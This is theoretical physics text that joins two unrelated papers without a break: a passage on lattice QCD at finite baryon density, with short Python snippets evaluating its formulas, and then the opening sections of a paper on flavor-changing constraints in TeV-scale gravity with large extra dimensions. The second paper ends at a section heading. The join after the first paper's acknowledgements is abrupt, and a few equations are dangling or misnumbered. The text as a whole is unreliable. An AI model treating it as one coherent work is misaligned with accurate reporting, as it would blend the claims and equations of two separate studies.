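Differentiating (6) gives the number density explicitly, $n=\partial f/\partial\mu = [\,(2m/e^{\mu})^{3L_t}+1\,]^{-1}$, a Fermi-type step that sharpens into a discontinuity at $\mu_c=\log(2m)$ as $L_t\rightarrow\infty$. A small numerical illustration (the mass value is chosen arbitrarily):

```python
import math

def number_density(mu, m, Lt):
    """n = df/dmu from eq. (6): n = 1 / ((2m/e^mu)^(3 Lt) + 1)."""
    x = 2.0 * m * math.exp(-mu)
    return 1.0 / (x ** (3 * Lt) + 1.0)

m = 5.0
mu_c = math.log(2 * m)
for Lt in (4, 16, 64):          # the step sharpens as Lt grows
    print(Lt, number_density(mu_c - 0.1, m, Lt), number_density(mu_c + 0.1, m, Lt))
print(number_density(mu_c, m, 64))   # exactly 1/2 at mu = mu_c
```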
This is an expected result on physical grounds. In fact in the infinite
fermion mass limit baryons are point-like particles, and
pion exchange interaction vanishes, since pions are also very heavy.
Therefore we are dealing with a system of very heavy free
fermions (baryons) and by increasing the
baryon density in such a system we expect an onset at
$\mu_c={1\over3}m_b$, i.e., $\mu_c=\log(2m)$ since $3\log(2m)$ is the baryon
mass at $\beta=0$ for large $m$ \cite{SACLAY}.
Let us now discuss the relevance of the phase of the
fermion determinant at $\beta=0$. The standard wisdom based on random matrix
model results is that the phase of the fermion determinant plays a fundamental
role in the thermodynamics of $QCD$ at finite baryon density \cite{RMT}
and that if
the theory is simulated by replacing the determinant by its absolute value,
one neglects a contribution to the free energy density which could be
fundamental in order to understand the critical behavior of this model.
We are going to show now that, contrary to this wisdom, the phase of the
determinant can be neglected in the large $m$ limit at $T=0$.
Equations (3) and (4) imply that an upper bound for the absolute
value of the fermion determinant is given by the determinant of the free
gauge configuration. Therefore the mean value of the phase factor in the
theory defined taking the absolute value of the determinant
\begin{equation}\label{7}
\left\langle e^{i\phi} \right\rangle_\| =
\frac{\int [dU] e^{-\beta S_G(U)}\det\Delta}
{\int [dU] e^{-\beta S_G(U)} | \det\Delta |}
\end{equation}
\noindent
is, at $\beta=0$, bounded from below by the ratio
\begin{equation}\label{8}
\left( \frac
{\left( \frac{2m}{e^\mu}\right)^{3L_t} + 1 }
{\left( \left( \frac{2m}{e^\mu}\right)^{L_t} + 1 \right)^3 }
\right)^{V_s}
\end{equation}
At zero temperature $(L_t=L, V_s=L^3)$, and letting $L\rightarrow\infty$,
it is straightforward to verify that the ratio (8)
goes to 1 except at $\mu_c=\log(2m)$
(at $\mu=\mu_c$ the ratio
goes to zero but it is bounded from below by $(1/4)^{V_s}$).
Therefore the mean value of
the cosine of the phase in the theory where the fermion determinant
is replaced by its absolute value gives zero contribution.
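Both limits are easy to see from the logarithm of the bound (8), evaluated in an overflow-safe way (a sketch; note that at $\mu=\mu_c$ the per-site factor is exactly $1/4$, reproducing the $(1/4)^{V_s}$ quoted above):

```python
import math

def log_bound(mu, m, Lt, Vs):
    """log of the lower bound (8) on <exp(i*phi)>_||, with x = 2m/e^mu."""
    lx = math.log(2.0 * m) - mu
    def log_xn_p1(n):                         # log(x^n + 1), overflow-safe
        a = n * lx
        return a + math.log1p(math.exp(-a)) if a > 0 else math.log1p(math.exp(a))
    return Vs * (log_xn_p1(3 * Lt) - 3 * log_xn_p1(Lt))

m, mu = 5.0, math.log(2 * 5.0) - 1.0          # below the onset, mu < mu_c
# T = 0 (L_t = L, V_s = L^3): the bound tends to 1
for L in (8, 16, 32):
    print(L, math.exp(log_bound(mu, m, L, L**3)))
# T > 0 (L_t fixed, V_s -> infinity): the log of the bound scales like -V_s
for Ls in (4, 8, 16):
    print(Ls, log_bound(mu, m, 4, Ls**3))
```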
At $T \neq 0$, i.e. taking the infinite $V_s$ limit by keeping
fixed $L_t$, the lower bound
(8) for the mean value of the phase factor (7) goes to zero exponentially
with the spatial lattice volume $V_s$. This suggests that the
phase will contribute in finite temperature $QCD$.
In fact, it
is easy to convince oneself that expression (7), at $\beta=0$, vanishes
also exponentially with the lattice spatial volume at finite temperature
(see fig. 1).
The contribution of the phase is therefore non zero (in the limit considered
here) in simulations of $QCD$ at finite temperature.
The free energy density at finite temperature (equation (6)) is an analytic
function of the fermion mass and chemical potential. It develops a
singularity only in the limit of zero temperature $(T={1\over{L_t}})$.
Therefore $QCD$ at large $m$ and finite temperature does not show
a phase transition in the
chemical potential but a crossover at $\mu=\log(2m)$ which becomes a true
first order phase transition at $T=0$.
The standard way to define the theory at zero temperature is to consider
symmetric lattices.
However a more natural way to define the theory at $T=0$
is to take the limit of finite temperature $QCD$ when the physical
temperature $T\rightarrow 0$.
In other words, we should take first the infinite spatial
volume limit and then the infinite temporal extent limit.
We will show here that, as expected, physical results are independent of
the procedure chosen.
The free energy density of the
model can be written as the sum of two contributions $f=f_1+f_2$. The first
contribution $f_1$ is the free energy density of the theory where the fermion
determinant in the integration measure is replaced by its absolute value.
The second contribution $f_2$, which comes from the phase of the fermion
determinant, can be written as
\begin{equation}\label{9}
f_2 = {1\over{V_sL_t}}\log\left\langle e^{i\phi} \right\rangle_\|.
\end{equation}
\noindent
Since the mean value of the phase factor (7) is less than or equal to 1,
$f_2$ is bounded from above by zero and from below by
\begin{equation}\label{10}
{1\over{L_t}}\log{\left( \frac
{\left( \frac{2m}{e^\mu}\right)^{3L_t} + 1 }
{\left( \left( \frac{2m}{e^\mu}\right)^{L_t} + 1 \right)^3 }
\right)}
\end{equation}
When $L_t$ goes to infinity, expression (10) goes to zero for all the
values of $\mu$ and therefore the
only contribution to the free energy density which survives in the zero
temperature limit is $f_1$.
Again, we conclude that zero temperature QCD in the strong coupling
limit at finite chemical potential
and for large fermion masses is well described by the theory obtained by
replacing the fermion determinant by its absolute value.
These results are not surprising, as they follow from the fact that at $\beta=0$
and for large $m$ the system factorizes as a product of $V_s$ noninteracting
$0+1$ dimensional $QCD's$ and from the relevance (irrelevance) of the phase
of the fermion determinant in $0+1$ QCD at finite (zero) "temperature"
\cite{LAT97}.
More surprising maybe is that, as we will see in the following,
some of these results do not change when we put a finite gauge coupling.
The inclusion of a non trivial pure gauge Boltzmann factor in the integration
measure of the partition function breaks the factorization property. The
effect of a finite gauge coupling is to induce correlations between the
different temporal chains of the determinant of the Dirac operator. The
partition function is given by
\begin{equation}\label{11}
{\cal Z} = \int [dU] e^{-\beta S_G(U)} \prod_{i=1}^{V_s}
(c^3 + 1 + c Tr (L_i^*) + c^2 Tr (L_i) )
\end{equation}
\noindent
and can be written as
\begin{equation}
{\cal Z}(\beta,\mu) = {\cal Z}_{pg}\cdot {\cal Z}(\beta=0,\mu)\cdot
R(\beta,\mu)
\end{equation}
\noindent
where ${\cal Z}_{pg}$ is the pure gauge partition function,
${\cal Z}(\beta=0,\mu)$ the strong coupling partition function
(equation (5)) and $R(\beta,\mu)$ is given by
\begin{equation}\label{12}
R(\beta,\mu) = \frac
{\int [dU] e^{-\beta S_G(U)} \prod_{i=1}^{V_s} \left(
1 + \frac{c Tr (L_i) + c^2 Tr (L_i^*)}{c^3 + 1} \right)}
{\int [dU] e^{-\beta S_G(U)}}
\end{equation}
In the zero temperature limit ($L_t=L, L_s=L^{3}, L\rightarrow\infty$) the
product in the numerator of (13) goes to 1 independently of the gauge
configuration. In fact each single factor has an absolute value equal to
1, up to corrections which vanish exponentially with the lattice size $L$,
and a phase which also vanishes exponentially with $L$. Since the total number
of factors is $L^3$, the product goes to 1 and therefore $R=1$ in the
zero temperature limit.
The contribution of $R$ to the free energy
density vanishes therefore in the infinite volume limit at zero temperature.
In such a case, the free energy density is the sum of the free energy density
of the pure gauge $SU(3)$ theory plus the free energy density of the model at
$\beta=0$ (equation (6)). The first order phase transition found at $\beta=0$
is also present at any $\beta$ and its location and properties do not
depend on $\beta$ since all $\beta$ dependence in the partition function
factorizes in the pure gauge contribution.
Again at finite gauge coupling
the phase of the fermion determinant is irrelevant at zero temperature.
At finite temperature and finite gauge coupling the first order phase
transition induced by the contribution (6) to the free energy density at
zero temperature disappears and becomes a crossover.
Furthermore, expression (13) also gives a non-vanishing contribution
to the free energy density if $L_t$ is finite.
The common physical interpretation of
the theory with the absolute value of the fermion determinant
is that it possesses
quarks in the {\bf 3} and {\bf 3}$^*$ representations of SU(3),
with baryonic states made up of two quarks, which would account for the
physical differences with respect to real QCD. We have proven analytically (at
$\beta=0$) that the relation between modulus and real QCD is
temperature dependent, $i.e.$ they differ only at $T \ne 0$,
a feature that does not support the above interpretation.
\section{Numerical results}
From the point of view of simulations, work has been done by
several groups, mainly to develop numerical algorithms capable of overcoming
the non-positivity of the fermionic determinant.
The most promising of these algorithms \cite{BAR}, \cite{NOI1}
are based on the GCPF formalism and try to calculate extensive quantities
(the canonical partition functions at fixed baryon number).
Usually they measure quantities that, with the available statistics, do not
converge.
In a previous paper \cite{NOI2} we have given arguments to conclude that,
if the phase is relevant, a statistics exponentially increasing
with the system volume
is necessary to appreciate its contribution to the observables (see also
\cite{BAR2} ).
What happens if we consider a case where the phase is not relevant
($i.e.$ the large mass limit of QCD at zero temperature, as discussed
in the previous section)?
To answer this question we have reformulated the GCPF formalism by
writing the partition function as a polynomial in
$c$ and studied the convergence properties of the coefficients at $\beta=0$
using an ensemble of (several thousands) random configurations.
This has been done as in standard numerical simulations ({\it i.e.}
without using the factorization property) for lattices $4^4$ (fig. 2a),
$4^3\times 20$ (fig. 2b), $10^3\times 4$ (fig. 2c) \cite{LAT98} and the
results compared with the analytical predictions (\ref{5}) (solid lines
in the figures).
From these plots we can see that, unless we consider a large lattice temporal
extent, our averaged coefficients in the infinite coupling limit still
suffer from sign ambiguities, {\it i.e.} not all of them are positive.
For large $L_t$ the {\it sign problem}
tends to disappear because the determinant of the one dimensional system
(\ref{4}) becomes an almost real quantity for each gauge configuration and
obviously the same happens to the determinant of the Dirac operator
(\ref{3}) in the four dimensional lattice.
It is also interesting to note that the sign of the averaged
coefficients is very stable and a different set of random configurations
produces almost the same shape.
However, the sign of the determinant is not the only problem: in fact,
as one can read from fig. 2, even considering the modulus of
the averaged coefficients we do not get the correct result.
We used the same configurations to calculate the average of the modulus of
the coefficients. We expect this quantity to be larger
than the analytic results reported in fig. 2.
The data, however, contrast with this scenario:
the averages of the modulus are always smaller (on a logarithmic scale)
than the analytic results from formula (\ref{5}).
In fact these averages are indistinguishable from the absolute values of
the numerical results reported in fig. 2.
In conclusion, even if the phase of the fermion
determinant is irrelevant in QCD at finite density ($T=0$ and heavy quarks)
the numerical evaluation of the Grand Canonical Partition Function
still suffers from sampling problems.
A last interesting feature which can be discussed on the light of our results
concerns the validity of the quenched approximation in finite density $QCD$.
An important amount of experience in this field \cite{KOGUT} suggests that
contrary to what happens in $QCD$ at finite and zero temperature, the quenched
approximation does not give correct results in $QCD$ at finite chemical
potential. Even if
the zero flavour limit of the theory with the absolute value of the
fermion determinant and of actual $QCD$ are the same (quenched approximation),
the failure of this approximation has been assigned in the past \cite{RMT}
to the fact that it corresponds to the zero flavour limit of the theory
with $n$ quarks in the fundamental and $n$ quarks in the complex
representation of
the gauge group. In fig. 3 we have plotted the number density at $\beta=0$ and
for heavy quarks in three interesting cases: actual $QCD$, the theory
with the absolute value of the fermion determinant and quenched $QCD$.
It is obvious that the quenched approximation produces results far from those
of actual $QCD$ but also far from those of $QCD$ with the modulus of the
determinant of the Dirac operator. The former results are furthermore very
near to those of actual $QCD$. In other words, even if the phase is relevant
at finite temperature, its contribution to the number density is almost
negligible.
In the light of these results it seems implausible to assign the failure of
the quenched approximation to the feature previously discussed \cite{RMT}.
It seems more natural to speculate that it fails because it does not
incorporate correctly in the path integral the Fermi-Dirac statistics, and
we do expect the Pauli exclusion principle to play, by far, a more relevant
role in finite density $QCD$ than in finite temperature $QCD$.
\vskip 0.3truecm
\noindent
{\bf Acknowledgements}
\vskip 0.3truecm
This work has been partially supported by CICYT and INFN.
\vskip 1 truecm
One of the fundamental mysteries of the Nature
is the enormous hierarchy between the observable values of the
weak interaction scale $M_W$ and the Planck scale $M_P$.
A possible solution to this mystery \cite{add} may have to do
with the fact that the fundamental scale of gravitational interaction
$M_{Pf}$ is as low as TeV, whereas the observed weakness
of the Newtonian coupling constant $G_N \sim M_P^{-2}$ is
due to the existence of $N$ large ($ \gg {\rm TeV}^{-1}$)
extra dimensions into which the gravitational flux can spread out.
At the distances larger than the typical size of these extra dimensions
($R$) gravity goes to its standard Einstein form.
For instance, for two test masses separated by the distance
$r\gg R$, the usual $1/r^2$ Newtonian low is recovered, and
the relation between the fundamental and observed Planck scales
is given by:
\begin{equation}
M_P^2 = M_{Pf}^{N + 2}R^N
\end{equation}
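For orientation, solving (1) for the radius gives $R=M_{Pf}^{-1}(M_P/M_{Pf})^{2/N}$; with the assumed values $M_{Pf}\sim 1$ TeV and $M_P\simeq 1.2\times 10^{19}$ GeV one obtains the familiar numbers (a rough numerical sketch):

```python
hbar_c_cm = 1.9733e-14     # conversion: 1 GeV^{-1} = 1.9733e-14 cm
M_P, M_Pf = 1.2e19, 1.0e3  # GeV; M_Pf ~ TeV is the assumption of the text

for N in (1, 2, 3, 6):
    R_cm = (hbar_c_cm / M_Pf) * (M_P / M_Pf) ** (2.0 / N)
    print(N, R_cm)
# N = 1 gives a macroscopic (solar-system scale) radius and is excluded;
# N = 2 gives R of a few millimeters, near short-distance gravity tests.
```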
In such a theory, quantum gravity becomes strong at energies $M_{Pf}$,
where presumably all the interactions must unify.\footnote{Witten suggested
\cite{witten} that string scale may be around the scale of
supersymmetric unification $\sim 10^{16} GeV$. The possibility of
having an extremely low string scale was also discussed by Lykken
\cite{lykken}.}
For all the reasonable choices of $N$, the size of extra radii is
within the experimental range in which the strong and
electroweak interactions have been probed.
Thus, unlike gravity, the other observed particles should not
"see" the extra dimension (at least up to energies $\sim$ TeV).
In ref. \cite{add} this was accomplished by postulating
that all the standard model particles are confined to
a $3 + 1$-dimensional hyper-surface ($3$-brane), whereas gravity
(as it should) penetrates the extra dimensional bulk\cite{walluniverse1}-\cite{kt}.
Thus, on a very general grounds, the particle spectrum of
the theory is divided in two categories:
(1) the standard model particles living on the $3$-brane
(brane modes);
(2) gravity and other possible hypothetical particles
propagating in the bulk (bulk modes).
Since extra dimensions are compact, any $4 + N$-dimensional
bulk field represents an infinite tower of the
four-dimensional Kaluza-Klein (KK) states with masses quantized in
units of inverse radii $R^{-1}$.
An important fact is that each of these states
(viewed as a four dimensional mode) has extremely weak,
suppressed at least as $M_P^{-1}$ couplings to the brane modes.
The ordinary four-dimensional graviton, which is
nothing but a lowest KK mode of the bulk graviton, is a
simplest example. In what follows, this fact will play a
crucial role as far as the other possible bulk particles
are concerned.
Obviously, such a scenario requires various compatibility
checks many of which were performed in
\cite{add},\cite{aadd},\cite{add*},\cite{adm}\cite{ndm}\cite{giudice},\cite{ns}.
It was shown that this scenario passes a
variety of the laboratory and astrophysical tests.
Most of the analysis was mainly concerned
with checking the "calculable" consequences of the theory,
ones that obviously arise and are possible
to estimate in the field (or string) theory picture.
On the other hand, there are constraints based on the
effects whose existence is impossible to prove or rule out
at the present stage of understanding of quantum gravity,
but which are usually believed to be there.
An expected violation of global quantum numbers by gravity
is an example. There are no rigorous proofs of such effect,
nor any knowledge of what their actual strength should be.
Yet, if an effect is there with a most naive dimensional
analysis we expect it to manifest itself in terms of all possible
gauge-symmetric operators suppressed by the Planck scale.
Below we adopt this philosophy, which then imposes
the severe constraints on the proposal of ref. \cite{add},
since now the fundamental gravity scale $M_{Pf}$
is as low as TeV!
Issues regarding baryon and lepton number violation
were discussed in \cite{aadd},\cite{tye}, \cite{add*} and
some ways out were suggested\footnote{The unification of gauge couplings is another
issue \cite{diduge} not to be addressed in this paper.}.
In the present paper we will discuss the flavor problem
in TeV scale quantum gravity theories induced by
higher order effective operators cutoff by the scale
$M_{Pf}$
that can contribute to various flavor-changing neutral
processes (FCNP), like $\bar K^0-K^0$ or $D^0 - \bar D^0$
transitions, $\mu \rightarrow e\gamma$ decay etc.
It is well known that flavor-violating interactions provide
severe constraints on any new physics beyond the
standard model.\footnote{
Unlike the baryon number non-conservation,
gravity-mediated FCNP are only important for a very low scale
quantum gravity theories: the lowest dimensional
baryon-number-violating operators scaled as $M_{Pf}^{-1}$
are problematic even for theories with $M_{Pf} = M_P$,
whereas the flavor problem disappears already for
$M_{Pf} > 10^{(7-8)}$ GeV or so.}
As we will see below the flavor problem provides
severe constraints both on the symmetry structure of
the theory and on the structure of fermion mass matrixes.
\subsection{The Problematic Operators and Gauge Family Symmetries}
As said above, in the effective low energy theory below TeV, we expect all possible
flavor
violating four-fermion operators scaled by $M_{Pf}^{-2}$. Some of these give
unacceptably large contributions to the flavor changing processes and must be
adequately suppressed. Let us consider what are the symmetries that can do the
job\footnote{
$N=1$ supersymmetry can not be of much help due to the following reasons:
first in any case it must be broken around TeV scale, and secondly the four-fermion
interaction can arise from the K\"ahler metric, which can not be controlled by
holomorphy.}. Usually one of the most sensitive processes to a new flavor-violating
physics
is the $K^0 - \bar K^0$ transition. Corresponding effective operator in the present
context
would have a form
\begin{equation}
{(\bar s d)^2 \over M_{Pf}^{2}} \label{kaon}
\end{equation}
This can only be suppressed by the symmetry that acts differently on $s$ and $d$ and
therefore is a
{\it family} symmetry. Thus, as a first requirement we have to invoke a gauge family
symmetry.
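To see the size of the problem, one can make a crude vacuum-saturation estimate (dropping all $O(1)$ bag and chirality factors, which is an assumption of this sketch): requiring the contribution $\Delta m_K\sim f_K^2 m_K/M^2$ of (\ref{kaon}) not to exceed the measured $K_L-K_S$ mass difference gives

```python
import math

f_K  = 0.16       # GeV, kaon decay constant (approximate)
m_K  = 0.497      # GeV, kaon mass
dm_K = 3.5e-15    # GeV, measured K_L - K_S mass difference

# Lower bound on the suppression scale of the (s-bar d)^2 operator,
# from dm_K_contribution ~ f_K^2 m_K / M^2 < dm_K (O(1) factors dropped)
M_min = math.sqrt(f_K**2 * m_K / dm_K)
print(M_min)      # ~2e6 GeV: a TeV cutoff overshoots by ~6 orders of magnitude
```

Including the CP-violating part ($\epsilon_K$) strengthens the bound by roughly two further orders of magnitude, consistent with the $10^{(7-8)}$ GeV figure quoted in the footnote above.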
In an ordinary (four-dimensional) field theory there would be an immediate problem with
this proposal. In order to adequately suppress the operator (\ref{kaon}), the
symmetry in
question
should be broken (well) below TeV. But there are well known lower bounds\cite{bounds}
$>> TeV$ on the scale of gauge flavor symmetry breaking. This bound comes
from the tree-level exchange of the horizontal gauge bosons, which
would mediate the very same FCNP for which the symmetry was invoked!
However, one has to remember that this is true as far as the four-dimensional field theory
is
concerned. Recall that in our case there are two types of particles, ordinary particles
living on a brane and the bulk modes. If the horizontal gauge field is the bulk mode
the situation is different. Now the coupling of each KK excitation
to the ordinary particles will be enormously suppressed.
This saves the scenario from being {\it a priori} excluded.
The large multiplicity of the
exchanged KK states however works against us and at the end puts severe
constraint on the dimensionality of extra space, flavor breaking scale and the pattern
of quark masses. We will discuss this in detail below.
Now let us discuss what are the symmetries that one can use.
In the limit of zero Yukawa couplings the standard model exhibits
an unbroken flavor symmetry group
\begin{equation}
G_F = U(3)_{Q_L}\otimes U(3)_{u_R}\otimes U(3)_{d_R}\otimes U(3)_{l_L}\otimes U(3)_{e_R}
\end{equation}
If one is going to gauge some subgroup of $G_F$,
the Yukawa coupling constants are to be understood as the
vacuum expectation values of the fields that break this
symmetry \cite{flavor}.
That is the fermion masses must be generated by the higher dimensional
operators of the form:
\begin{equation}
\left ({\chi \over M}\right )^N_{ab} H \bar Q_L^aq_R^b \label{chi}
\end{equation}
where $\chi$ are flavor-breaking Higgses.
In addressing this problem, it is natural
and most economical to assume that the above desired operators
are generated by the same physics which induces the problematic ones.
Thus we adopt that $M \sim M_{Pf}$.
An observed fermion mass hierarchy then
is accounted by hierarchical breaking of $G_F$.
In the present paper we will not be interested how
precisely such a hierarchy of VEVs is generated,
but rather will look for its consequences as far as FCNP are
concerned.
Now the large Yukawa coupling of the
top quark indicates that at least
$U(3)_{Q_L}\otimes U(3)_{u_R} \rightarrow
U(2)_{Q_L}\otimes U(2)_{u_R}$ breaking should occur
at the scale $\sim M_{Pf}$ and thus it can not provide any
significant suppression.
Therefore, the selection rules for the operators
that involve purely $Q_L$ and $u_R$ states can be based essentially
on $U(2)_{Q_L}\otimes U(2)_{u_R}$ symmetry or its subgroups.
The most problematic dimension six operators in this respect are
(below we will not specify explicitly the Lorentz structure,
since in each case it will be clear from the context):
\begin{equation}
(\bar Q_L^aQ_{La})(\bar Q_L^{b}Q_{Lb})~+~
(\bar Q_L^aQ_{Lc})(\bar Q_L^b Q_{Ld})
\epsilon_{ab}\epsilon^{cd} \label{problematic}
\end{equation}
They both give a crudely similar effect.
So let us for definiteness concentrate on
the second one. Written in terms
of initial $s$ and $d$ states (call it 'flavor basis') it has a form:
\begin{equation}
(\bar s_Ls_L)(\bar d_Ld_L) - (\bar s_Ld_L)(\bar d_Ls_L)
\end{equation}
In general initial $s$ and $d$ states are not physical states
and are related to them by $2\times 2$ rotation $D_L$, which diagonalizes $1-2$ block of
the
down quark mass matrix $M^d$. The problem is that $D_L$ is {\it not} in general unitary
due
to non-zero $1-3$ and/or $2-3$ mixing in $M^d$. Note that these
elements can be of the order of one, without conflicting with small
$2-3$ and $1-3$ mixings in the Cabibbo-Kobayashi-Maskawa (CKM) matrix, since CKM
measures a mismatch between rotations of $u_L$ and $d_L$ and not
each of them separately.
If so, then in the physical basis the disastrous operator
\begin{equation}
(\bar s_Ld_L)(\bar s_Ld_L) \label{induced}
\end{equation}
will be induced with an unacceptable strength. This puts a severe constraint on the
structure of $M^d$. In particular all the ans\"{a}tze with both large $1-2$ and $2-3$ (or
$1-3$) elements are ruled out. Note that smallness of $1-3$ and $2-3$ mixing in
$M^d$ also works in favor of suppression of $B^0 - \bar B^0$ transitions from the same
operator. Analogously, unitarity of $1-2$ diagonalization in $M^u$ suppresses the
$D^0 - \bar D^0$ transition. In this respect the safest scenario would be the one in which,
$1-2$ mixing in CKM comes mostly from down type masses, whereas $2-3$ mixing from ups.
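This non-unitarity is easy to exhibit with toy mass matrices (the numbers below are purely illustrative, not fits): the $2\times 2$ light-flavor block of the full left rotation, which plays the role of $D_L$, stays unitary for a hierarchical $M^d$, but fails badly once an $O(1)$ $2-3$ entry is switched on:

```python
import numpy as np

def left_block(Md):
    """1-2 block of the unitary U_L that diagonalizes Md Md^dagger."""
    w, U = np.linalg.eigh(Md @ Md.conj().T)   # eigenvalues ascending
    return U[:2, :2]                          # components of the two light states

eps = 0.05
M_small23 = np.array([[eps**2, eps**3, 0.0], [eps**3, eps, 0.0], [0.0, 0.0, 1.0]])
M_large23 = np.array([[eps**2, eps**3, 0.0], [eps**3, eps, 0.7], [0.0, 0.0, 1.0]])

for M in (M_small23, M_large23):
    B = left_block(M)
    print(np.linalg.norm(B @ B.conj().T - np.eye(2)))  # 0 iff D_L unitary
```

Since CKM only sees the combination $U_L^{u\dagger}U_L^{d}$, such an $O(1)$ $2-3$ entry in $M^d$ is not by itself excluded by the smallness of $V_{cb}$.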
Much in the same way the operator
\begin{equation}
(\bar d_R^ad_{R\alpha})(\bar d_R^bd_{R\beta})
\epsilon_{ab}\epsilon^{\alpha\beta} \label{RRRR}
\end{equation}
gives a unitarity constraint on the $1-2$ block of $D_R$,
which can be somewhat milder since the operator (\ref{RRRR})
can in principle be suppressed by $U(3)_{d_R}$-symmetry,
by a factor $\sim m_b/m_t$.
For the operators which involve both left and right-handed quark states, the
suppression factors are more sensitive
to what subgroup of the $G_F$ is gauged.
\subsection{$L\times R$-Type Symmetries}
If the left- and the right-handed quarks transform
under different $U(2)_{FL}\otimes U(2)_{FR}$
flavor symmetries, the only possible unsuppressed operator is
\begin{equation}
(\bar Q_L^aQ_{La})(\bar Q_R^bQ_{R_b}) \label{barLR}
\end{equation}
(plus its Fierz-equivalent combinations).
Again, this is harmless only if $D_L$ and $D_R$ are nearly unitary,
which brings us back to the constraint discussed above.
\subsubsection{The Diagonal $U(2)_F$}
From the point of view of an anomaly cancellation,
the most economic possibility would be to gauge a diagonal
subgroup of $G_F$ under which all fermions are in the
fundamental representation.
Then at scales below $M_{Pf}$ we are left with an effective
$U(2)_F$ symmetry. In such a case one encounters an option
whether $U(2)_F$ is a chiral or vector-like symmetry.
It turns out that the chiral $U(2)_F$ is insufficient to
suppress a large flavor violation, whereas the vector-like
one can do the job, provided a stronger
restriction on the fermion mass pattern is met.\footnote{
Unfortunately, however, the vector-like
flavor symmetry $U(2)_F$ allows the fermion mass
degeneracy, and unnatural
conspiracies would be needed for explaining their observed
splitting. In this view, it would be most natural if the
vector-like $U(2)_F$ is supplemented by some (discrete of continuous) gauge chiral
piece of the full chiral $(L\times R)$ symmetry.}
To support the first statement it is enough to consider an operator:
\begin{equation}
(\bar Q_L^ad_L^{\alpha})(\bar Q_{Ra}d_{R\alpha}) \label{chiralLR}
\end{equation}
This is invariant under the chiral $U(2)_F$ times an
arbitrary combination of extra $U(1)$ factors.
Obviously this operator is a disaster, since it directly contains
the unsuppressed four-Fermi interaction (\ref{kaon}).
Thus the chiral $U(2)_F$ cannot protect us.
On the other hand the vector-like $U(2)$
suppresses (\ref{chiralLR}). Analogous
(self-conjugate) operators in this case would have the form:
\begin{equation}
(\bar Q_L^ad_{Ra})(\bar d_R^bQ_{Lb}), ~~~~
(\bar Q_L^ad_{R\alpha})(\bar d_R^bQ_{L\beta})
\epsilon_{ab}\epsilon^{\alpha\beta} \label{vectLR}
\end{equation}
which contains no (\ref{kaon}) term in the flavor basis.
The requirement that it not be induced in the physical
basis simply translates into the requirement that
\begin{equation}
D_LD_R^+ = D_LD_L^+ = D_R D_R^+ = 1 \label{unitarity}
\end{equation}
hold to great accuracy.
In other words, this means that the fermion mass matrices
should be nearly Hermitian.\footnote{This might be rather
natural in the context of the left-right symmetric model
$SU(2)_L\times SU(2)_R\times U(1)$.}
If this is satisfied, the other operators do not lead to
additional constraints, since they are further suppressed.
For instance, non-self-conjugate operators:
\begin{equation}
(\bar Q_L^ad_{Ra})(\bar Q_L^bd_{Rb}), ~~~~
(\bar Q_L^ad_{R\alpha})(\bar Q_L^bd_{R\beta})
\epsilon_{ab}\epsilon^{\alpha\beta} \label{vectLR2}
\end{equation}
carry two units of weak isospin and must be
suppressed by an extra factor $\sim \left ( {M_W \over M_{Pf}} \right )^2$.
In conclusion, we see that all working versions converge to the
requirement (\ref{unitarity}).
\subsubsection{Why Abelian Symmetries Cannot Work}
Although our analysis was quite general,
one may wonder whether, by considering non-Abelian symmetries,
one is restricting the possible set of solutions: for example,
the requirement of $SU(2)$ symmetry restricts the possible charge
assignments under the additional $U(1)$ factors, which otherwise
could be used for the same purpose. In other words,
one may ask whether, instead of non-Abelian symmetries, one
could have invoked a variety of $U(1)$ factors and, by properly
adjusting the charges of the different fermions, obtained the same
(or even stronger) suppression of FCNP.
We now argue that this is not the case:
even if (neglecting aesthetics and various technical
complications, such as anomalies) one allows a completely arbitrary
charge assignment under an arbitrary number of $U(1)$ factors,
the problem cannot be solved. The reason is that
no Abelian symmetry can forbid operators of the form
\begin{equation}
C_{ab}(\bar Q_L^aQ_{La})(\bar Q_L^bQ_{Lb})
\end{equation}
and similarly for the right-handed fermions.
Since no non-Abelian symmetry is invoked, the coefficients
$C_{ab}$ are completely arbitrary. Due to this fact there is
no choice of fermion mass matrices which would avoid the appearance
of either $(\bar sd)^2$ or $(\bar uc)^2$ unsuppressed vertices.
Since the $C_{ab}$ are arbitrary, the non-appearance of any of these operators
would mean that the flavor and the physical quark states coincide
(that is, the mass matrices are diagonal in the flavor basis). But this
cannot be the case in both the up and down sectors
simultaneously, due to the non-zero Cabibbo mixing $\sin\theta_C=0.22$.
\begin{equation}
\sin^2\theta_C/M_{Pf}^2
\end{equation}
This gives rise to an unacceptably large contribution
to either $\bar K^0 - K^0$ or $\bar D^0 - D^0$ transitions.
The only way to avoid the problem would be a conspiracy
between the $C_{ab}$ coefficients, which can be guaranteed
by a non-Abelian $U(2)$ symmetry
(subject to unitarity of the $U_L, U_R, D_L$ and $D_R$ transformations).
\subsection{Electroweak Higgs-Mediated Flavour Violation}
The existence of the $M_{Pf}$-suppressed operators
brings another potential source of flavour violation,
mediated by the electrically neutral component ($H^0$)
of the standard model Higgs.
In the standard model this source is absent, since
the couplings of $H^0$ are automatically
diagonal in the physical basis.
This is no longer true if higher-dimensional operators
with more Higgs vertices are involved\cite{Rattazzi}.
For instance, add the lowest possible such operator
\begin{equation}
\left (g_{ab} + h_{ab}{H^+H \over M_{Pf}^2} + ...\right ) H\bar Q^a_Lq_{Rb}
\end{equation}
where $g_{ab}$ and $h_{ab}$ are constants.
After $H$ gets an expectation value the fermion masses become
\begin{equation}
M_{ab} = \left (g_{ab} + h_{ab}{|\langle H \rangle|^2
\over M_{Pf}^2} + ...\right ) \langle
H \rangle
\end{equation}
whereas the Yukawa couplings of the physical Higgs are
\begin{equation}
Y_{ab} = g_{ab} + 3h_{ab}{|\langle H \rangle|^2 \over M_{Pf}^2} + ...
\end{equation}
In the absence of flavour symmetries the matrices $g_{ab}$ and $h_{ab}$ are arbitrary $3\times
3$ matrices, and thus $M_{ab}$ and $Y_{ab}$ are not diagonal in the same basis. This induces
an unacceptably large flavour violation. In the present context, however, according to
Eq.~(\ref{chi}), $g_{ab}$ and $h_{ab}$ must be understood as
the VEVs of the horizontal Higgs scalars,
\begin{equation}
g_{ab} \sim h_{ab} \sim \left ({\chi \over M}\right )^{N_{ab}} \label{hierarchy}
\end{equation}
and thus obey {\it approximately the same} hierarchy \cite{gd}. This can reduce the
resulting flavor violation to an acceptable level. For instance, adopting
the ansatz $Y_{ab} \sim {\sqrt{m_am_b} \over M_W}$ \cite{chengsher}, where $m_a$ are the masses of the
physical
fermions, the resulting flavour violation can be below the experimental limits.
\subsection{The Decay $\mu \rightarrow e\gamma$, etc.}
